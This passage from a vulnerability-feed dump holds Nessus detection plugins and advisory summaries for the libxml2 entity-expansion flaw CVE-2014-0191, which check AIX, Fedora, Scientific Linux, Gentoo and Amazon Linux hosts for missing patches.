get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mingw-libxml2-2.9.2-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-libxml2\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T09:17:42", "description": "Libxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().", "edition": 23, "published": "2014-08-20T00:00:00", "title": "AIX 6.1 TL 8 : libxml2 (IV62447)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2014-08-20T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV62447.NASL", "href": "https://www.tenable.com/plugins/nessus/77257", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libxml2_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77257);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0191\");\n\n script_name(english:\"AIX 6.1 TL 8 : libxml2 (IV62447)\");\n script_summary(english:\"Check for APAR IV62447\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Libxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"04\", patch:\"IV62447s4a\", package:\"bos.rte.control\", minfilesetver:\"6.1.8.0\", maxfilesetver:\"6.1.8.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:12:28", "description": "Update to libxml2 2.9.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2015-01-02T00:00:00", "title": "Fedora 21 : mingw-libxml2-2.9.2-1.fc21 (2014-17609)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2015-01-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:mingw-libxml2"], "id": "FEDORA_2014-17609.NASL", "href": "https://www.tenable.com/plugins/nessus/80327", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17609.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80327);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_bugtraq_id(67233);\n script_xref(name:\"FEDORA\", value:\"2014-17609\");\n\n script_name(english:\"Fedora 21 : mingw-libxml2-2.9.2-1.fc21 (2014-17609)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to libxml2 2.9.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1107557\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147320.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?64192413\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mingw-libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"mingw-libxml2-2.9.2-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-libxml2\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:48:44", "description": "It was discovered that libxml2 loaded external parameter entities even\nwhen entity substitution was disabled. A remote attacker able to\nprovide a specially crafted XML file to an application linked against\nlibxml2 could use this flaw to conduct XML External Entity (XXE)\nattacks, possibly resulting in a denial of service or an information\nleak on the system. (CVE-2014-0191)\n\nThe desktop must be restarted (log out, then log back in) for this\nupdate to take effect.", "edition": 14, "published": "2015-03-31T00:00:00", "title": "Scientific Linux Security Update : libxml2 on SL7.x x86_64 (20150330)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2015-03-31T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:libxml2-python", "p-cpe:/a:fermilab:scientific_linux:libxml2-debuginfo", "p-cpe:/a:fermilab:scientific_linux:libxml2", "p-cpe:/a:fermilab:scientific_linux:libxml2-devel", "p-cpe:/a:fermilab:scientific_linux:libxml2-static", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150330_LIBXML2_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/82468", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82468);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0191\");\n\n script_name(english:\"Scientific Linux Security Update : libxml2 on SL7.x x86_64 (20150330)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that libxml2 loaded external parameter entities even\nwhen entity substitution was disabled. A remote attacker able to\nprovide a specially crafted XML file to an application linked against\nlibxml2 could use this flaw to conduct XML External Entity (XXE)\nattacks, possibly resulting in a denial of service or an information\nleak on the system. (CVE-2014-0191)\n\nThe desktop must be restarted (log out, then log back in) for this\nupdate to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1503&L=scientific-linux-errata&T=0&P=4139\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?00a8d46f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-2.9.1-5.el7_1.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-debuginfo-2.9.1-5.el7_1.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-devel-2.9.1-5.el7_1.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-python-2.9.1-5.el7_1.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-static-2.9.1-5.el7_1.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-debuginfo / libxml2-devel / libxml2-python / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T10:56:24", "description": "The remote host is affected by the vulnerability described in GLSA-201409-08\n(libxml2: Denial of Service)\n\n A vulnerability in the xmlParserHandlePEReference() function of\n parser.c, when expanding entity references, can be exploited to consume\n large amounts of memory and cause a crash or hang.\n \nImpact :\n\n A remote attacker may be able to cause Denial of Service via a specially\n crafted XML file containing malicious attributes.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 20, "published": "2014-09-22T00:00:00", "title": "GLSA-201409-08 : libxml2: Denial of Service", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2014-09-22T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:libxml2"], "id": "GENTOO_GLSA-201409-08.NASL", "href": "https://www.tenable.com/plugins/nessus/77776", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201409-08.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77776);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_bugtraq_id(67233);\n script_xref(name:\"GLSA\", value:\"201409-08\");\n\n script_name(english:\"GLSA-201409-08 : libxml2: Denial of Service\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201409-08\n(libxml2: Denial of Service)\n\n A vulnerability in the xmlParserHandlePEReference() function of\n parser.c, when expanding entity references, can be exploited to consume\n large amounts of memory and cause a crash or hang.\n \nImpact :\n\n A remote attacker may be able to cause Denial of Service via a specially\n crafted XML file containing malicious attributes.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201409-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All libxml2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/libxml2-2.9.1-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/libxml2\", unaffected:make_list(\"ge 2.9.1-r4\"), vulnerable:make_list(\"lt 2.9.1-r4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T09:17:42", "description": "Libxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().", "edition": 23, "published": "2014-08-20T00:00:00", "title": "AIX 7.1 TL 3 : libxml2 (IV62450)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2014-08-20T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV62450.NASL", "href": "https://www.tenable.com/plugins/nessus/77260", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libxml2_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77260);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0191\");\n\n script_name(english:\"AIX 7.1 TL 3 : libxml2 (IV62450)\");\n script_summary(english:\"Check for APAR IV62450\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Libxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"03\", sp:\"03\", patch:\"IV62450s3a\", package:\"bos.rte.control\", minfilesetver:\"7.1.3.0\", maxfilesetver:\"7.1.3.15\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T01:18:48", "description": "It was discovered that libxml2, a library providing support to read,\nmodify and write XML files, incorrectly performs entity substituton in\nthe doctype prolog, even if the application using libxml2 disabled any\nentity substitution. A remote attacker could provide a specially\ncrafted XML file that, when processed, would lead to the exhaustion of\nCPU and memory resources or file descriptors.", "edition": 23, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : libxml2 (ALAS-2014-341)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libxml2-devel", "p-cpe:/a:amazon:linux:libxml2", "p-cpe:/a:amazon:linux:libxml2-python", "p-cpe:/a:amazon:linux:libxml2-debuginfo", "p-cpe:/a:amazon:linux:libxml2-static", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-341.NASL", "href": "https://www.tenable.com/plugins/nessus/78284", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-341.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78284);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_xref(name:\"ALAS\", value:\"2014-341\");\n\n script_name(english:\"Amazon Linux AMI : libxml2 (ALAS-2014-341)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that libxml2, a library providing support to read,\nmodify and write XML files, incorrectly performs entity substituton in\nthe doctype prolog, even if the application using libxml2 disabled any\nentity substitution. A remote attacker could provide a specially\ncrafted XML file that, when processed, would lead to the exhaustion of\nCPU and memory resources or file descriptors.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-341.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update libxml2' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-2.9.1-1.1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-debuginfo-2.9.1-1.1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-devel-2.9.1-1.1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-python-2.9.1-1.1.30.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"libxml2-static-2.9.1-1.1.30.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-debuginfo / libxml2-devel / libxml2-python / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T09:48:40", "description": "Daniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.", "edition": 15, "published": "2014-07-15T00:00:00", "title": "Debian DSA-2978-1 : libxml2 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2014-07-15T00:00:00", "cpe": 